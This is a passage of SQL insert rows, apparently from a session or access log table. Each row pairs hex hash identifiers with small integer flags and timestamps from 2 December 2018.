(34361, '5b0f98824f9e7727e4135e457634505f', '6521fe834dce4d43', 0, 2, 1, '2018-12-02 09:27:05'),
(34362, '41f1cd21ae07364087aad2898c2df626', '629ac4ab56bd2f1d', 0, 2, 1, '2018-12-02 09:27:10'),
(34363, '0c94e8f87f746f4b4cc1d60d3f36ebcc', 'dace6e0c219330fc', 0, 2, 1, '2018-12-02 09:27:13'),
(34364, 'cb92eadd2c2a6e961fff801455af38e0', '07f71785f50a6319', 0, 2, 1, '2018-12-02 09:27:17'),
(34365, '0c94e8f87f746f4b4cc1d60d3f36ebcc', 'dace6e0c219330fc', 0, 2, 1, '2018-12-02 09:27:27'),
(34366, '2444265514171d1bc9c540c167b18642', 'dcadb578720d99b9', 0, 2, 1, '2018-12-02 09:27:32'),
(34367, '5b0f98824f9e7727e4135e457634505f', '6521fe834dce4d43', 0, 2, 1, '2018-12-02 09:27:36'),
(34368, 'c7c93f2b603657a759e5efef06003028', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-02 09:27:38'),
(34369, 'f53cb2d8bdd4b24a7461b5b056f7edf5', '011d2a53201a4204', 0, 2, 1, '2018-12-02 09:27:57'),
(34370, 'd78b4ce8c2f10ee921a060a578a9f223', 'ebf847c408421dc4', 0, 2, 1, '2018-12-02 09:28:44'),
(34371, '0daa5f5799ea7daa65afac05d11d74af', '4574603cf07e6399', 0, 2, 1, '2018-12-02 09:28:44'),
(34372, '0daa5f5799ea7daa65afac05d11d74af', '4574603cf07e6399', 0, 2, 1, '2018-12-02 09:29:34'),
(34373, 'bb38d2df3587162211bd8421f4fe0aae', 'b50d65df97c0251e', 0, 2, 1, '2018-12-02 09:29:59'),
(34374, 'e47b0619712cfe461e0bce34ebfc5765', 'e598745d36e98349', 0, 2, 1, '2018-12-02 09:32:34'),
(34375, '3442898c40a19cda589e1ace4b1da839', 'ec138ac7c35c53a7', 0, 2, 1, '2018-12-02 09:32:39'),
(34376, '5b0f98824f9e7727e4135e457634505f', '6521fe834dce4d43', 0, 2, 1, '2018-12-02 09:35:04'),
(34377, 'bb38d2df3587162211bd8421f4fe0aae', 'b50d65df97c0251e', 0, 2, 1, '2018-12-02 09:36:40'),
(34378, 'ba7ee7da4a421ed0b1ec83731cb0c276', '814e14b432590743', 0, 2, 1, '2018-12-02 09:38:59'),
(34379, '042fb86248a01a7985839d91e3c2332f', 'ca27090608e53158', 0, 2, 1, '2018-12-02 09:39:40'),
(34380, '513cb75a5e41856d19b3319f10042ed9', '1a2abc95118965ed', 0, 2, 1, '2018-12-02 09:43:44'),
(34381, '1a49ec264ec14a5a268d82ccf7da3e76', '721a08095e6444d9', 0, 2, 1, '2018-12-02 09:44:39'),
(34382, 'cf8b471a82143832c2fa2411da1af34c', 'e3454d790deac400', 0, 2, 1, '2018-12-02 09:47:45'),
(34383, '1e85060449625b6e2d8df90095ef89ef', 'b0d0f692147f0dd4', 0, 2, 1, '2018-12-02 09:49:20'),
(34384, '3442898c40a19cda589e1ace4b1da839', 'ec138ac7c35c53a7', 0, 2, 1, '2018-12-02 09:53:20'),
(34385, '4812ad391edb548019b75315dbb51c6e', '9bd992699e70b92d', 0, 2, 1, '2018-12-02 09:53:37'),
(34386, '41f1cd21ae07364087aad2898c2df626', '629ac4ab56bd2f1d', 0, 2, 1, '2018-12-02 09:54:03'),
(34387, '4812ad391edb548019b75315dbb51c6e', '9bd992699e70b92d', 0, 2, 1, '2018-12-02 09:54:06'),
(34388, '9fb31f21a7f7e466828dae4dabdd0633', '4c07673592205f17', 0, 2, 1, '2018-12-02 09:54:09'),
(34389, '0c94e8f87f746f4b4cc1d60d3f36ebcc', 'dace6e0c219330fc', 0, 2, 1, '2018-12-02 09:54:15'),
(34390, '66778d70b4b715e9bac02f7d80854963', '6e117bd555667400', 0, 2, 1, '2018-12-02 09:54:24'),
(34391, '41f1cd21ae07364087aad2898c2df626', '629ac4ab56bd2f1d', 0, 2, 1, '2018-12-02 09:54:29'),
(34392, 'c7c93f2b603657a759e5efef06003028', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-02 09:54:30'),
(34393, 'b99e7cead750d4837cacad09337b74ac', '6537a8a3624775b8', 0, 2, 1, '2018-12-02 09:54:31'),
(34394, '7897d8ba5a028da1925b98e40154d19b', 'b9974a919762d897', 0, 2, 1, '2018-12-02 09:54:32'),
(34395, '9fb31f21a7f7e466828dae4dabdd0633', '4c07673592205f17', 0, 2, 1, '2018-12-02 09:54:36'),
(34396, '0c94e8f87f746f4b4cc1d60d3f36ebcc', 'dace6e0c219330fc', 0, 2, 1, '2018-12-02 09:54:45'),
(34397, '3442898c40a19cda589e1ace4b1da839', 'ec138ac7c35c53a7', 0, 2, 1, '2018-12-02 09:54:46'),
(34398, 'cb92eadd2c2a6e961fff801455af38e0', '07f71785f50a6319', 0, 2, 1, '2018-12-02 09:54:51'),
(34399, 'f874e0566ca366b3355493402c86c508', 'fe961668877fa513', 0, 2, 1, '2018-12-02 09:54:52'),
(34400, '4812ad391edb548019b75315dbb51c6e', '9bd992699e70b92d', 0, 2, 1, '2018-12-02 09:54:55'),
(34401, '41f1cd21ae07364087aad2898c2df626', '629ac4ab56bd2f1d', 0, 2, 1, '2018-12-02 09:54:59'),
(34402, '66778d70b4b715e9bac02f7d80854963', '6e117bd555667400', 0, 2, 1, '2018-12-02 09:55:03'),
(34403, 'c7c93f2b603657a759e5efef06003028', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-02 09:55:04'),
(34404, 'bb38d2df3587162211bd8421f4fe0aae', 'b50d65df97c0251e', 0, 2, 1, '2018-12-02 09:55:05'),
(34405, 'f8c32fa822cef626d0b7b39acb954598', '9a903552e28cf43c', 0, 2, 1, '2018-12-02 09:55:10'),
(34406, '9fb31f21a7f7e466828dae4dabdd0633', '4c07673592205f17', 0, 2, 1, '2018-12-02 09:55:13'),
(34407, '6d874addb930089fccae9cd117796af7', '93f30eaefda9d8c4', 0, 2, 1, '2018-12-02 09:55:14'),
(34408, '621abc4d677eb394c5d9214c7d8ef963', '74aba437eea39f30', 0, 2, 1, '2018-12-02 09:55:34'),
(34409, '928dd7005f2c79b2856eee0718ac9b15', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-02 09:56:50'),
(34410, '5b0f98824f9e7727e4135e457634505f', '6521fe834dce4d43', 0, 2, 1, '2018-12-02 09:58:49'),
(34411, 'd7fc59c19a71bd00cbf664e9860cbbfe', '0363da53de791a17', 0, 2, 1, '2018-12-02 09:58:55'),
(34412, '509d638b8dd0a0351cdf8a7d3878677e', '0f7f21a2d2575f0b', 0, 2, 1, '2018-12-02 09:59:16'),
(34413, 'ee1683c31974d1633db74cd3e2e998a0', 'b3bdf3b5186f52cc', 0, 2, 1, '2018-12-02 09:59:48'),
(34414, '70c35b7a06ad6755fca29611b9fd7e7f', '721a08095e6444d9', 0, 2, 1, '2018-12-02 09:59:50'),
(34415, '41f1cd21ae07364087aad2898c2df626', '629ac4ab56bd2f1d', 0, 2, 1, '2018-12-02 09:59:58'),
(34416, 'cb92eadd2c2a6e961fff801455af38e0', '07f71785f50a6319', 0, 2, 1, '2018-12-02 10:00:10'),
(34417, 'c7c93f2b603657a759e5efef06003028', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-02 10:00:10'),
(34418, 'f8c32fa822cef626d0b7b39acb954598', '9a903552e28cf43c', 0, 2, 1, '2018-12-02 10:00:16'),
(34419, 'ee1683c31974d1633db74cd3e2e998a0', 'b3bdf3b5186f52cc', 0, 2, 1, '2018-12-02 10:00:19'),
(34420, '0c94e8f87f746f4b4cc1d60d3f36ebcc', 'dace6e0c219330fc', 0, 2, 1, '2018-12-02 10:00:19'),
(34421, '4812ad391edb548019b75315dbb51c6e', '9bd992699e70b92d', 0, 2, 1, '2018-12-02 10:00:41'),
(34422, '621abc4d677eb394c5d9214c7d8ef963', '74aba437eea39f30', 0, 2, 1, '2018-12-02 10:00:45'),
(34423, '509d638b8dd0a0351cdf8a7d3878677e', '0f7f21a2d2575f0b', 0, 2, 1, '2018-12-02 10:00:47'),
(34424, '65dd42b310f9b640de2c4e55a436f8d8', '7e798cbe39231340', 0, 2, 1, '2018-12-02 10:00:55'),
(34425, '66778d70b4b715e9bac02f7d80854963', '6e117bd555667400', 0, 2, 1, '2018-12-02 10:00:55'),
(34426, '3442898c40a19cda589e1ace4b1da839', 'ec138ac7c35c53a7', 0, 2, 1, '2018-12-02 10:01:31'),
(34427, 'd7fc59c19a71bd00cbf664e9860cbbfe', '0363da53de791a17', 0, 2, 1, '2018-12-02 10:01:42'),
(34428, '928dd7005f2c79b2856eee0718ac9b15', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-02 10:01:46'),
(34429, '4498bb208df81023adb1876effce4eee', '267638c83cee8f17', 0, 2, 1, '2018-12-02 10:01:55'),
(34430, '70fde4c2670d778a9a198987e9cd73f1', 'f2be47c7b5e54850', 0, 2, 1, '2018-12-02 10:02:01'),
(34431, '4498bb208df81023adb1876effce4eee', '267638c83cee8f17', 0, 2, 1, '2018-12-02 10:02:09'),
(34432, 'f874e0566ca366b3355493402c86c508', 'fe961668877fa513', 0, 2, 1, '2018-12-02 10:02:19'),
(34433, '70fde4c2670d778a9a198987e9cd73f1', 'f2be47c7b5e54850', 0, 2, 1, '2018-12-02 10:02:25'),
(34434, 'bdc5b3e6e5e5c0df8b1651f6046417e1', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-02 10:02:34'),
(34435, '0c94e8f87f746f4b4cc1d60d3f36ebcc', 'dace6e0c219330fc', 0, 2, 1, '2018-12-02 10:03:32'),
(34436, '3442898c40a19cda589e1ace4b1da839', 'ec138ac7c35c53a7', 0, 2, 1, '2018-12-02 10:04:14'),
(34437, 'f924383f7e6440586606344998e0d0ff', '31e5aab61ec6096e', 0, 2, 1, '2018-12-02 10:04:15'),
(34438, '79af55e3c3ff515f98872b73d740d961', '08097e1065e57da0', 0, 2, 1, '2018-12-02 10:06:32'),
(34439, '3442898c40a19cda589e1ace4b1da839', 'ec138ac7c35c53a7', 0, 2, 1, '2018-12-02 10:07:06'),
(34440, 'b09e2016e219739045ed3250d56d23d2', '4526df3445228767', 0, 2, 1, '2018-12-02 10:07:36'),
(34441, '22ce4d99259a46b40067ea83d9e4b235', 'f27681df79b531e4', 0, 2, 1, '2018-12-02 10:08:39'),
(34442, '22ce4d99259a46b40067ea83d9e4b235', 'f27681df79b531e4', 0, 2, 1, '2018-12-02 10:08:52'),
(34443, '8b8b3cc0cf470d2974230b23e6f517a1', '4c8d57f1ea3e9071', 0, 2, 1, '2018-12-02 10:10:46'),
(34444, '6d874addb930089fccae9cd117796af7', '93f30eaefda9d8c4', 0, 2, 1, '2018-12-02 10:12:16'),
(34445, '25ac41b9163fc5be5881728ff9c981c0', '779493fa905c6d91', 0, 2, 1, '2018-12-02 10:12:59'),
(34446, '25ac41b9163fc5be5881728ff9c981c0', '779493fa905c6d91', 0, 2, 1, '2018-12-02 10:13:11'),
(34447, '0daa5f5799ea7daa65afac05d11d74af', '4574603cf07e6399', 0, 2, 1, '2018-12-02 10:14:26'),
(34448, 'ba7ee7da4a421ed0b1ec83731cb0c276', '814e14b432590743', 0, 2, 1, '2018-12-02 10:15:12'),
(34449, '25ac41b9163fc5be5881728ff9c981c0', '779493fa905c6d91', 0, 2, 1, '2018-12-02 10:18:27'),
(34450, '25ac41b9163fc5be5881728ff9c981c0', '779493fa905c6d91', 0, 2, 1, '2018-12-02 10:19:01'),
(34451, '25ac41b9163fc5be5881728ff9c981c0', '779493fa905c6d91', 0, 2, 1, '2018-12-02 10:19:46'),
(34452, '25ac41b9163fc5be5881728ff9c981c0', '779493fa905c6d91', 0, 2, 1, '2018-12-02 10:20:03'),
(34453, 'ff8b284c0d6a996b176710ac9c4006dc', '19df97d9486e23d7', 0, 2, 1, '2018-12-02 10:21:16'),
(34454, 'b632c0fba29f7c64ac7116c1698371cf', 'da8cf8a61fa6af28', 0, 2, 1, '2018-12-02 10:21:41'),
(34455, 'f67dd3d80f2bd5e6b4455990db5e7ae9', '68d6262f427661c5', 0, 2, 1, '2018-12-02 10:22:06'),
(34456, '8b8b3cc0cf470d2974230b23e6f517a1', '4c8d57f1ea3e9071', 0, 2, 1, '2018-12-02 10:22:11'),
(34457, '462c3644004f5914a47de9fc9717cd25', '1fe68226bb896748', 0, 2, 1, '2018-12-02 10:22:20'),
(34458, '462c3644004f5914a47de9fc9717cd25', '1fe68226bb896748', 0, 2, 1, '2018-12-02 10:23:00'),
(34459, '3442898c40a19cda589e1ace4b1da839', 'ec138ac7c35c53a7', 0, 2, 1, '2018-12-02 10:25:14'),
(34460, 'a61c89bd7b756296b2c0b290ac13495b', 'b0d0f692147f0dd4', 0, 2, 1, '2018-12-02 10:29:04'),
(34461, 'c7c93f2b603657a759e5efef06003028', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-02 10:30:48'),
(34462, '0c94e8f87f746f4b4cc1d60d3f36ebcc', 'dace6e0c219330fc', 0, 2, 1, '2018-12-02 10:30:48'),
(34463, 'bdc5b3e6e5e5c0df8b1651f6046417e1', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-02 10:30:52'),
(34464, '66778d70b4b715e9bac02f7d80854963', '6e117bd555667400', 0, 2, 1, '2018-12-02 10:30:52'),
(34465, '4812ad391edb548019b75315dbb51c6e', '9bd992699e70b92d', 0, 2, 1, '2018-12-02 10:30:56'),
(34466, '621abc4d677eb394c5d9214c7d8ef963', '74aba437eea39f30', 0, 2, 1, '2018-12-02 10:30:58'),
(34467, '9fb31f21a7f7e466828dae4dabdd0633', '4c07673592205f17', 0, 2, 1, '2018-12-02 10:31:00'),
(34468, '41f1cd21ae07364087aad2898c2df626', '629ac4ab56bd2f1d', 0, 2, 1, '2018-12-02 10:31:08'),
(34469, '796b3fbc5af97559896eaad57171a70d', '8a144e5fc2e94311', 0, 2, 1, '2018-12-02 10:31:14'),
(34470, '0c94e8f87f746f4b4cc1d60d3f36ebcc', 'dace6e0c219330fc', 0, 2, 1, '2018-12-02 10:31:22'),
(34471, '04c8395742c68de2bec04daf2a81e894', 'b57104b37a2d8fd8', 0, 2, 1, '2018-12-02 10:31:31'),
(34472, '9fb31f21a7f7e466828dae4dabdd0633', '4c07673592205f17', 0, 2, 1, '2018-12-02 10:31:39'),
(34473, '0c94e8f87f746f4b4cc1d60d3f36ebcc', 'dace6e0c219330fc', 0, 2, 1, '2018-12-02 10:31:40'),
(34474, '796b3fbc5af97559896eaad57171a70d', '8a144e5fc2e94311', 0, 2, 1, '2018-12-02 10:31:48'),
(34475, '7897d8ba5a028da1925b98e40154d19b', 'b9974a919762d897', 0, 2, 1, '2018-12-02 10:31:49'),
(34476, 'f1461c9323d9716e3513be4274936360', 'de7301b790319868', 0, 2, 1, '2018-12-02 10:32:44'),
(34477, 'b3a565ecb324492147be66245e9719cc', 'fb0ef74560de5f81', 0, 2, 1, '2018-12-02 10:33:49'),
(34478, '621abc4d677eb394c5d9214c7d8ef963', '74aba437eea39f30', 0, 2, 1, '2018-12-02 10:34:06'),
(34479, '462c3644004f5914a47de9fc9717cd25', '1fe68226bb896748', 0, 2, 1, '2018-12-02 10:34:09'),
(34480, '41f1cd21ae07364087aad2898c2df626', '629ac4ab56bd2f1d', 0, 2, 1, '2018-12-02 10:34:56'),
(34481, 'bb38d2df3587162211bd8421f4fe0aae', 'b50d65df97c0251e', 0, 2, 1, '2018-12-02 10:35:16'),
(34482, '0daa5f5799ea7daa65afac05d11d74af', '4574603cf07e6399', 0, 2, 1, '2018-12-02 10:35:35'),
(34483, 'fd3a6b3f857e6047dd45ebca0f518ae4', 'f52a42a05787db8d', 0, 2, 1, '2018-12-02 10:35:53'),
(34484, '3442898c40a19cda589e1ace4b1da839', 'ec138ac7c35c53a7', 0, 2, 1, '2018-12-02 10:37:17'),
(34485, '41f1cd21ae07364087aad2898c2df626', '629ac4ab56bd2f1d', 0, 2, 1, '2018-12-02 10:38:20'),
(34486, '0daa5f5799ea7daa65afac05d11d74af', '4574603cf07e6399', 0, 2, 1, '2018-12-02 10:38:21'),
(34487, '0c94e8f87f746f4b4cc1d60d3f36ebcc', 'dace6e0c219330fc', 0, 2, 1, '2018-12-02 10:38:39'),
(34488, 'b99e7cead750d4837cacad09337b74ac', '6537a8a3624775b8', 0, 2, 1, '2018-12-02 10:38:53'),
(34489, 'fd3a6b3f857e6047dd45ebca0f518ae4', 'f52a42a05787db8d', 0, 2, 1, '2018-12-02 10:38:55'),
(34490, '22ce4d99259a46b40067ea83d9e4b235', 'f27681df79b531e4', 0, 2, 1, '2018-12-02 10:38:59'),
(34491, '674d97591a6909f7d58f2720fe07bb99', '1d9c54d0b37930ed', 0, 2, 1, '2018-12-02 10:39:16'),
(34492, '674d97591a6909f7d58f2720fe07bb99', '1d9c54d0b37930ed', 0, 2, 1, '2018-12-02 10:39:26'),
(34493, '25ac41b9163fc5be5881728ff9c981c0', '779493fa905c6d91', 0, 2, 1, '2018-12-02 10:40:16'),
(34494, 'bb38d2df3587162211bd8421f4fe0aae', 'b50d65df97c0251e', 0, 2, 1, '2018-12-02 10:41:27'),
(34495, '3442898c40a19cda589e1ace4b1da839', 'ec138ac7c35c53a7', 0, 2, 1, '2018-12-02 10:42:42'),
(34496, 'd7f8b3ab316aeea2130693fa9a6305c3', '22f43a16a511f701', 0, 2, 1, '2018-12-02 10:46:00'),
(34497, '3442898c40a19cda589e1ace4b1da839', 'ec138ac7c35c53a7', 0, 2, 1, '2018-12-02 10:47:09'),
(34498, '0daa5f5799ea7daa65afac05d11d74af', '4574603cf07e6399', 0, 2, 1, '2018-12-02 10:48:26'),
(34499, '0c94e8f87f746f4b4cc1d60d3f36ebcc', 'dace6e0c219330fc', 0, 2, 1, '2018-12-02 10:50:57'),
(34500, '0daa5f5799ea7daa65afac05d11d74af', '4574603cf07e6399', 0, 2, 1, '2018-12-02 10:51:05'),
(34501, '0c94e8f87f746f4b4cc1d60d3f36ebcc', 'dace6e0c219330fc', 0, 2, 1, '2018-12-02 10:51:07'),
(34502, '41f1cd21ae07364087aad2898c2df626', '629ac4ab56bd2f1d', 0, 2, 1, '2018-12-02 10:51:09'),
(34503, 'c7c93f2b603657a759e5efef06003028', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-02 10:51:18'),
(34504, 'b99e7cead750d4837cacad09337b74ac', '6537a8a3624775b8', 0, 2, 1, '2018-12-02 10:51:18'),
(34505, '41f1cd21ae07364087aad2898c2df626', '629ac4ab56bd2f1d', 0, 2, 1, '2018-12-02 10:51:24'),
(34506, '9fb31f21a7f7e466828dae4dabdd0633', '4c07673592205f17', 0, 2, 1, '2018-12-02 10:51:25'),
(34507, '0c94e8f87f746f4b4cc1d60d3f36ebcc', 'dace6e0c219330fc', 0, 2, 1, '2018-12-02 10:51:27'),
(34508, 'fd3a6b3f857e6047dd45ebca0f518ae4', 'f52a42a05787db8d', 0, 2, 1, '2018-12-02 10:51:28'),
(34509, 'bdc5b3e6e5e5c0df8b1651f6046417e1', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-02 10:51:33'),
(34510, 'b99e7cead750d4837cacad09337b74ac', '6537a8a3624775b8', 0, 2, 1, '2018-12-02 10:51:36'),
(34511, 'bb38d2df3587162211bd8421f4fe0aae', 'b50d65df97c0251e', 0, 2, 1, '2018-12-02 10:51:38'),
(34512, '9fb31f21a7f7e466828dae4dabdd0633', '4c07673592205f17', 0, 2, 1, '2018-12-02 10:51:45'),
(34513, '0c94e8f87f746f4b4cc1d60d3f36ebcc', 'dace6e0c219330fc', 0, 2, 1, '2018-12-02 10:51:58'),
(34514, '04c8395742c68de2bec04daf2a81e894', 'b57104b37a2d8fd8', 0, 2, 1, '2018-12-02 10:51:58'),
(34515, 'c7c93f2b603657a759e5efef06003028', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-02 10:52:04'),
(34516, '4812ad391edb548019b75315dbb51c6e', '9bd992699e70b92d', 0, 2, 1, '2018-12-02 10:52:05'),
(34517, 'ddc5f54ba80ac55fc588306d32640b28', '03656dd438efd1a5', 0, 2, 1, '2018-12-02 10:52:16'),
(34518, '6d874addb930089fccae9cd117796af7', '93f30eaefda9d8c4', 0, 2, 1, '2018-12-02 10:52:27'),
(34519, 'bf84c99f8124293d4efab91a205ead69', '73c34699cef21812', 0, 2, 1, '2018-12-02 10:52:43'),
(34520, '8c1f548d370d643c4945285b351daa3d', 'ca462b5454a864cc', 0, 2, 1, '2018-12-02 10:52:52'),
(34521, '41f1cd21ae07364087aad2898c2df626', '629ac4ab56bd2f1d', 0, 2, 1, '2018-12-02 10:52:55'),
(34522, '0c94e8f87f746f4b4cc1d60d3f36ebcc', 'dace6e0c219330fc', 0, 2, 1, '2018-12-02 10:53:09'),
(34523, '9fb31f21a7f7e466828dae4dabdd0633', '4c07673592205f17', 0, 2, 1, '2018-12-02 10:53:14'),
(34524, 'c7c93f2b603657a759e5efef06003028', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-02 10:53:21'),
(34525, '0daa5f5799ea7daa65afac05d11d74af', '4574603cf07e6399', 0, 2, 1, '2018-12-02 10:53:25'),
(34526, 'bdc5b3e6e5e5c0df8b1651f6046417e1', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-02 10:53:27'),
(34527, '489c13a961f77b64ffcd34cbd8cfdc58', 'd40300dc5b83c344', 0, 2, 1, '2018-12-02 10:53:51'),
(34528, '4812ad391edb548019b75315dbb51c6e', '9bd992699e70b92d', 0, 2, 1, '2018-12-02 10:53:55'),
(34529, '489c13a961f77b64ffcd34cbd8cfdc58', 'd40300dc5b83c344', 0, 2, 1, '2018-12-02 10:53:59'),
(34530, '25c9550e9a38eae88afc931d46ad8386', 'b53e985da0a7d5bd', 0, 2, 1, '2018-12-02 10:54:20'),
(34531, '73d742459557e136026a7ead1ee9e0ef', '0678e618450e11c6', 0, 2, 1, '2018-12-02 10:54:33'),
(34532, '25c9550e9a38eae88afc931d46ad8386', 'b53e985da0a7d5bd', 0, 2, 1, '2018-12-02 10:55:52'),
(34533, '0daa5f5799ea7daa65afac05d11d74af', '4574603cf07e6399', 0, 2, 1, '2018-12-02 10:56:17'),
(34534, '6e307f59ff42ae6713d19579e0eb90a3', '0af82b59811a48be', 0, 2, 1, '2018-12-02 10:56:54'),
(34535, '9273ecee46b7fce6aa57b9626a8cc67a', '960d12b6c14f65ca', 0, 2, 1, '2018-12-02 10:57:07'),
(34536, '621abc4d677eb394c5d9214c7d8ef963', '74aba437eea39f30', 0, 2, 1, '2018-12-02 10:57:19'),
(34537, '7e2908ecb6d00b2573d7eac203e95124', '8e815b2f4d02fe94', 0, 2, 1, '2018-12-02 10:57:55'),
(34538, '64d73010c33391c56e39d56a8ae9c2d6', 'ebf847c408421dc4', 0, 2, 1, '2018-12-02 10:59:13'),
(34539, 'ed12091f69c110bb88884f6b6f70ebe0', '721a08095e6444d9', 0, 2, 1, '2018-12-02 10:59:46'),
(34540, 'f0adcf79afb85aabd24a35df85e02b0c', 'baa8d16c1a4e5230', 0, 2, 1, '2018-12-02 11:00:41'),
(34541, 'fd3a6b3f857e6047dd45ebca0f518ae4', 'f52a42a05787db8d', 0, 2, 1, '2018-12-02 11:02:03'),
(34542, 'c3a64089a8b65d8870c2d0e14340a424', 'ea8ce1362d7b20cc', 0, 2, 1, '2018-12-02 11:02:40'),
(34543, '41f1cd21ae07364087aad2898c2df626', '629ac4ab56bd2f1d', 0, 2, 1, '2018-12-02 11:02:40'),
(34544, '4812ad391edb548019b75315dbb51c6e', '9bd992699e70b92d', 0, 2, 1, '2018-12-02 11:02:40'),
(34545, '25c9550e9a38eae88afc931d46ad8386', 'b53e985da0a7d5bd', 0, 2, 1, '2018-12-02 11:02:41'),
(34546, '0c94e8f87f746f4b4cc1d60d3f36ebcc', 'dace6e0c219330fc', 0, 2, 1, '2018-12-02 11:02:42'),
(34547, 'bdc5b3e6e5e5c0df8b1651f6046417e1', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-02 11:02:42'),
(34548, '9fb31f21a7f7e466828dae4dabdd0633', '4c07673592205f17', 0, 2, 1, '2018-12-02 11:02:49'),
(34549, 'cb92eadd2c2a6e961fff801455af38e0', '07f71785f50a6319', 0, 2, 1, '2018-12-02 11:02:53'),
(34550, '41f1cd21ae07364087aad2898c2df626', '629ac4ab56bd2f1d', 0, 2, 1, '2018-12-02 11:02:53'),
(34551, '25ac41b9163fc5be5881728ff9c981c0', '779493fa905c6d91', 0, 2, 1, '2018-12-02 11:02:56'),
(34552, 'c3a64089a8b65d8870c2d0e14340a424', 'ea8ce1362d7b20cc', 0, 2, 1, '2018-12-02 11:02:57'),
(34553, '0c94e8f87f746f4b4cc1d60d3f36ebcc', 'dace6e0c219330fc', 0, 2, 1, '2018-12-02 11:02:58'),
(34554, '4812ad391edb548019b75315dbb51c6e', '9bd992699e70b92d', 0, 2, 1, '2018-12-02 11:02:58'),
(34555, 'c7c93f2b603657a759e5efef06003028', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-02 11:02:58'),
(34556, '41f1cd21ae07364087aad2898c2df626', '629ac4ab56bd2f1d', 0, 2, 1, '2018-12-02 11:03:04'),
(34557, 'cb92eadd2c2a6e961fff801455af38e0', '07f71785f50a6319', 0, 2, 1, '2018-12-02 11:03:06'),
(34558, '9fb31f21a7f7e466828dae4dabdd0633', '4c07673592205f17', 0, 2, 1, '2018-12-02 11:03:11'),
(34559, '0c94e8f87f746f4b4cc1d60d3f36ebcc', 'dace6e0c219330fc', 0, 2, 1, '2018-12-02 11:03:17'),
(34560, '41f1cd21ae07364087aad2898c2df626', '629ac4ab56bd2f1d', 0, 2, 1, '2018-12-02 11:03:19'),
(34561, '04c8395742c68de2bec04daf2a81e894', 'b57104b37a2d8fd8', 0, 2, 1, '2018-12-02 11:03:25'),
(34562, 'cb92eadd2c2a6e961fff801455af38e0', '07f71785f50a6319', 0, 2, 1, '2018-12-02 11:03:30'),
(34563, '4812ad391edb548019b75315dbb51c6e', '9bd992699e70b92d', 0, 2, 1, '2018-12-02 11:03:34'),
(34564, '0c94e8f87f746f4b4cc1d60d3f36ebcc', 'dace6e0c219330fc', 0, 2, 1, '2018-12-02 11:03:35'),
(34565, '2444265514171d1bc9c540c167b18642', 'dcadb578720d99b9', 0, 2, 1, '2018-12-02 11:03:35'),
(34566, '9fb31f21a7f7e466828dae4dabdd0633', '4c07673592205f17', 0, 2, 1, '2018-12-02 11:03:37'),
(34567, '49829ffd597684067c4b6dd7281b3709', 'f2be47c7b5e54850', 0, 2, 1, '2018-12-02 11:03:54'),
(34568, '6d874addb930089fccae9cd117796af7', '93f30eaefda9d8c4', 0, 2, 1, '2018-12-02 11:03:59'),
(34569, 'c511fa997b25493cd9261eea284d06bb', 'd04c5d81b6e92e1c', 0, 2, 1, '2018-12-02 11:04:00'),
(34570, 'bb38d2df3587162211bd8421f4fe0aae', 'b50d65df97c0251e', 0, 2, 1, '2018-12-02 11:04:07'),
(34571, 'c511fa997b25493cd9261eea284d06bb', 'd04c5d81b6e92e1c', 0, 2, 1, '2018-12-02 11:04:13'),
(34572, '7e19022da6f4fdb432f7df4ba184f06d', '9113ca554f25f876', 0, 2, 1, '2018-12-02 11:04:18'),
(34573, 'a88b750d99fc0d8ab98390fd36fdc2a2', 'de9b8e6bc6e762ed', 0, 2, 1, '2018-12-02 11:05:54'),
(34574, '96e6aae8fad13b88322cecfdd4c9e99b', '1ec75219d7482e28', 0, 2, 1, '2018-12-02 11:06:57'),
(34575, 'db849211dd009edab34717e83bd013e1', '7501b42c35accff7', 0, 2, 1, '2018-12-02 11:07:07'),
(34576, 'db849211dd009edab34717e83bd013e1', '7501b42c35accff7', 0, 2, 1, '2018-12-02 11:07:23'),
(34577, '0daa5f5799ea7daa65afac05d11d74af', '4574603cf07e6399', 0, 2, 1, '2018-12-02 11:07:50'),
(34578, '462c3644004f5914a47de9fc9717cd25', '1fe68226bb896748', 0, 2, 1, '2018-12-02 11:08:10'),
(34579, 'bdc5b3e6e5e5c0df8b1651f6046417e1', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-02 11:08:17'),
(34580, '6aaf0c64ba08bd94adac5db6953abe64', '2ea7201b0e939b00', 0, 2, 1, '2018-12-02 11:08:50'),
(34581, '462c3644004f5914a47de9fc9717cd25', '1fe68226bb896748', 0, 2, 1, '2018-12-02 11:09:07'),
(34582, 'bb38d2df3587162211bd8421f4fe0aae', 'b50d65df97c0251e', 0, 2, 1, '2018-12-02 11:09:54'),
(34583, '0daa5f5799ea7daa65afac05d11d74af', '4574603cf07e6399', 0, 2, 1, '2018-12-02 11:10:26'),
(34584, '4812ad391edb548019b75315dbb51c6e', '9bd992699e70b92d', 0, 2, 1, '2018-12-02 11:10:28'),
(34585, 'a88b750d99fc0d8ab98390fd36fdc2a2', 'de9b8e6bc6e762ed', 0, 2, 1, '2018-12-02 11:10:36'),
(34586, '2444265514171d1bc9c540c167b18642', 'dcadb578720d99b9', 0, 2, 1, '2018-12-02 11:10:39'),
(34587, '41f1cd21ae07364087aad2898c2df626', '629ac4ab56bd2f1d', 0, 2, 1, '2018-12-02 11:10:40'),
(34588, '9fb31f21a7f7e466828dae4dabdd0633', '4c07673592205f17', 0, 2, 1, '2018-12-02 11:10:48'),
(34589, '2444265514171d1bc9c540c167b18642', 'dcadb578720d99b9', 0, 2, 1, '2018-12-02 11:10:51'),
(34590, '96a44932f5e9a35fab2078041cc1ed15', 'b0d0f692147f0dd4', 0, 2, 1, '2018-12-02 11:10:52'),
(34591, '0c94e8f87f746f4b4cc1d60d3f36ebcc', 'dace6e0c219330fc', 0, 2, 1, '2018-12-02 11:10:53'),
